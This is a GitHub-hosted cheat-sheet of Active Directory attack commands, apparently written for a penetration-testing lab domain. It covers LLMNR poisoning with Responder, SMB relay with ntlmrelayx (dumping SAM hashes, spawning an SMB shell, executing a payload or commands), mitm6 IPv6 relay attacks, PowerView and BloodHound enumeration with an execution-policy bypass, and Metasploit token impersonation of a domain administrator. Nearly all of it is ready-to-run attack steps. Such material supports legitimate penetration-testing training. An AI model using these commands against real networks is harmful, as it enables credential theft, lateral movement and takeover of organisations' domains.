Skip to content

Latest commit

 

History

History
125 lines (96 loc) · 3.26 KB

File metadata and controls

125 lines (96 loc) · 3.26 KB

Active Directory

LLMNR Poisoning

# Linked Local Multi-cast Name Resolution Poisoning using Impacket tool, Responder.
# Run this first thing, even before as it will capture generated traffic.

# Capture NTLMv2 Hash with Responder. Start listening for events
responder -I eth0 -rdw

SMB Relay. User must be admin on both machines.

# SMB signing must be disabled.
nmap --script=smb2-security-mode.nse -p445 <ip>

# Set /usr/share/responder/Responder.conf SMB=Off HTTP=Off. Then run
responder -I eth0 -rdw

# Add IP's from nmap to targets.txt. Run the relay and wait for an event to happen
# It will return the SAM hashes
python ntlmrelayx.py -tf targets.txt -smb2support

SMB Relay to an SMB Shell

# As above, except for ntlmrelayx
python ntlmrelayx.py -tf targets.txt -smb2support -I

# Once the event is triggered, an interactive SMB shell will be created at an ip eg. 127.0.0.1:11000
nc 127.0.0.1 11000

# Can then use SMB share commands to interact
help
shares
use ADMIN$
ls

Other SMB Relay ntlmrelayx options

# Create a meterpreter shell and execute
python ntlmrelayx.py -tf targets.txt -smb2support -e payload.exe

# Execute a command
python ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

IPV6 Attacks

# git clone https://github.com/fox-it/mitm6.git then nav to directory
# pip3 install .
mitm6 -d marvel.local

# Now in a different terminal setup a relay attack
ntlmrelayx.py -6 -t ldaps://<domaincontrollerip> -wh fakewpad.marvel.local -l lootme

# Once users are enumerated, look in the lootme directory it created for info

Post Compromise Enumeration

PowerView

# Use https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
powershell -ep bypass # Bypasses the execution policy

# In the directory the PowerView.ps1 script is in
. .\PowerView.ps1

# Return information for the domain
Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
(Get-DomainPolicy)."system access"

# Get user information
Get-NetUser
Get-NetUser | select cn [or samaccountname, description]
Get-UserProperty -Properties pwdlastset [or logoncount, badpwdcount]

# Get computer information in domain
Get-NetComputer -FullData | select OperatingSystem
Get-NetGroup -GroupName *admin*
Get-NetGroupMember -GroupName "Domain Admins"

# Check SMB Shares
Invoke-ShareFinder

# Group Policies
Get-NetGPO | select displayname, whenchanged

Bloodhound

# apt install bloodhound if not installed
neo4j console

# Visit localhost and use neo4j:neo4j to log in and change password
# Then back in terminal
bloodhound    # Login with your creds in browser that opens 

# Use https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1 on target
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip

# Copy file.zip to hacking box with bloodhound open, and upload file.zip to bloodhound
# Select hamburger icon on left top to start looking at imported data.

Post Compromise Attacks

Token Impersonation with Incognito

# With a metasploit shell
load incognito

# To see incognito commands
help

# List user tokens present on the system
list_tokens -u

# Impersonate the token using a \\ for character escaping
impersonate_token marvel\\administrator